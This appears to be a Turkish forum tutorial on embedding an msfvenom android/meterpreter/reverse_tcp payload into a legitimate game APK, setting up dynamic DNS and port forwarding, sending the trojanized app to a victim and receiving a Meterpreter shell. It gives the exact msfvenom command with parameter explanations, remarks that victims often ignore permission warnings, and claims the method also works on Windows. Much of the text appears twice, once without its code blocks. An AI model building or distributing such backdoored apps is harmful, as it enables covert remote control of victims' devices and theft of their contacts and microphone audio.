Merhaba arkadaşlar bu gün sizlere msfvenom ve msfconsole kullanarak
nasıl bir apk'ya payload gömüp onu bir backdoora çevireceğimizi göstereceğim
KONUYU BEĞENİRSENİZ TEŞEKKÜR ETMEYİ UNUTMAYIN
ADIM-1
Öncelikle duckdns.org 'a girip IP'miz (static değilse) bir domain oluşturuyoruz bu IP'mizin değişmesine ve unutmamıza karşı bize önlem olacakdır.(Zaten çok kolay bir arayüzü var başka bir dynamic dns servisi'de kullanabilirsiniz)
ADIM-2
Modemimizde kafamıza göre bir portu yönlendiriyoruz ben 4444 portunu seçtim.(Her modeme göre port yönlendirme farklıdır.) (NAT sekmesinin altında olur genellikle.)
ADIM-3
İstediğiniz bir uygulamanın apk'sını indirin.Ben Terraria'nınkini indirdim.
ADIM-4
Terminali açın ve şu komutları kendinize göre olanlarını yazın.
PARAMETRE AÇIKLAMASI:
ADIM-5
Kurbana apk'yı gönderdik şimdi onu kurup açmasını bekliyeceğiz bunun için msfconsol'u hazırlamalıyız.
Bunun için alttaki kodları msfconsol'a yazmalıyız.
SONRASINDA İSE METERPRETER SİZE GELMİŞ OLUYOR VE ORADAKİ BÜTÜN KOMUTLARI YAPTIRABİLİYORSUNUZ.(Komutlar için help yazabilirsiniz)
OLUŞTURDUĞUNUZ APK BAĞZI TELEFONLARDA KURARKEN FARK REHBERİ VE MİKROFONU VS KULLANACAĞINI FARK EDEBİLİYOR AMA KURBAN ALDIRIŞ ETMEZ VE KURARSA ÇALIŞIR.
AYNI YÖNTEMİ WİNDOWS İÇİN DE KULLANABİLİRSİNİZ.
ÇIKARDIĞIMIZ DOSYANIN VİRUSTOTAL'İ(EĞER BİR APK DOSYASINA BAĞLAMAZSANIZ DAHA ÇOK BULUNUR)
İŞİNİZE YARADIYSA NE MUTLU BANA! TEŞEKKÜR KOYMAYI UNUTMAYIN!(BAĞZI HATALARIM OLABİLİR ONLARIDA DAHA BİLGİLİ ARKADAŞLAR DÜZELTİRSE SEVİNİRİM SAĞLICAKLI KALIN)
nasıl bir apk'ya payload gömüp onu bir backdoora çevireceğimizi göstereceğim
KONUYU BEĞENİRSENİZ TEŞEKKÜR ETMEYİ UNUTMAYIN
ADIM-1
Öncelikle duckdns.org 'a girip IP'miz (static değilse) bir domain oluşturuyoruz bu IP'mizin değişmesine ve unutmamıza karşı bize önlem olacakdır.(Zaten çok kolay bir arayüzü var başka bir dynamic dns servisi'de kullanabilirsiniz)
ADIM-2
Modemimizde kafamıza göre bir portu yönlendiriyoruz ben 4444 portunu seçtim.(Her modeme göre port yönlendirme farklıdır.) (NAT sekmesinin altında olur genellikle.)
ADIM-3
İstediğiniz bir uygulamanın apk'sını indirin.Ben Terraria'nınkini indirdim.
ADIM-4
Terminali açın ve şu komutları kendinize göre olanlarını yazın.
Kod:
msfvenom -x apkadi.apk -p android/meterpreter/reverse_tcp LHOST=dinamikadresiniz LPORT=444 -k -o cikti.apk
PARAMETRE AÇIKLAMASI:
Kod:
[COLOR=Lime]-x : Backdooru açacağınız(payloadı yükleyeceğiniz) apk bu istediğiniz bir uygulama olabilir.[/COLOR]
Kod:
[COLOR=Lime]-p : Kullanacağımız payload demek oluyor burada android/meterpreter/reverse_tcp isimli payloadı kullanıyoruz(Reverse TCP sizin kurbana değil kurbanın size tcp protokolü ile {programı açınca başlar} bağlanmasını sağlar).[/COLOR]
Kod:
[COLOR=Lime]LHOST : Kurbanın bağlanacağı IP
LPORT : Kurbanın bağlanacağı IP'nin bağlanacağı port[/COLOR]
Kod:
[COLOR=Lime]-k : orjinal apknın(izin seçtip indirdiğiniz uygulama) bozulmamasını sağlıyor ve onun üzerine yazacağına yeni bir tane oluşturuyor[/COLOR]
Kod:
[COLOR=Lime]-o : çıktının adını venereye olduğunu gösteriyor[/COLOR]
ADIM-5
Kurbana apk'yı gönderdik şimdi onu kurup açmasını bekliyeceğiz bunun için msfconsol'u hazırlamalıyız.
Bunun için alttaki kodları msfconsol'a yazmalıyız.
SONRASINDA İSE METERPRETER SİZE GELMİŞ OLUYOR VE ORADAKİ BÜTÜN KOMUTLARI YAPTIRABİLİYORSUNUZ.(Komutlar için help yazabilirsiniz)
OLUŞTURDUĞUNUZ APK BAĞZI TELEFONLARDA KURARKEN FARK REHBERİ VE MİKROFONU VS KULLANACAĞINI FARK EDEBİLİYOR AMA KURBAN ALDIRIŞ ETMEZ VE KURARSA ÇALIŞIR.
AYNI YÖNTEMİ WİNDOWS İÇİN DE KULLANABİLİRSİNİZ.
ÇIKARDIĞIMIZ DOSYANIN VİRUSTOTAL'İ(EĞER BİR APK DOSYASINA BAĞLAMAZSANIZ DAHA ÇOK BULUNUR)
İŞİNİZE YARADIYSA NE MUTLU BANA! TEŞEKKÜR KOYMAYI UNUTMAYIN!(BAĞZI HATALARIM OLABİLİR ONLARIDA DAHA BİLGİLİ ARKADAŞLAR DÜZELTİRSE SEVİNİRİM SAĞLICAKLI KALIN)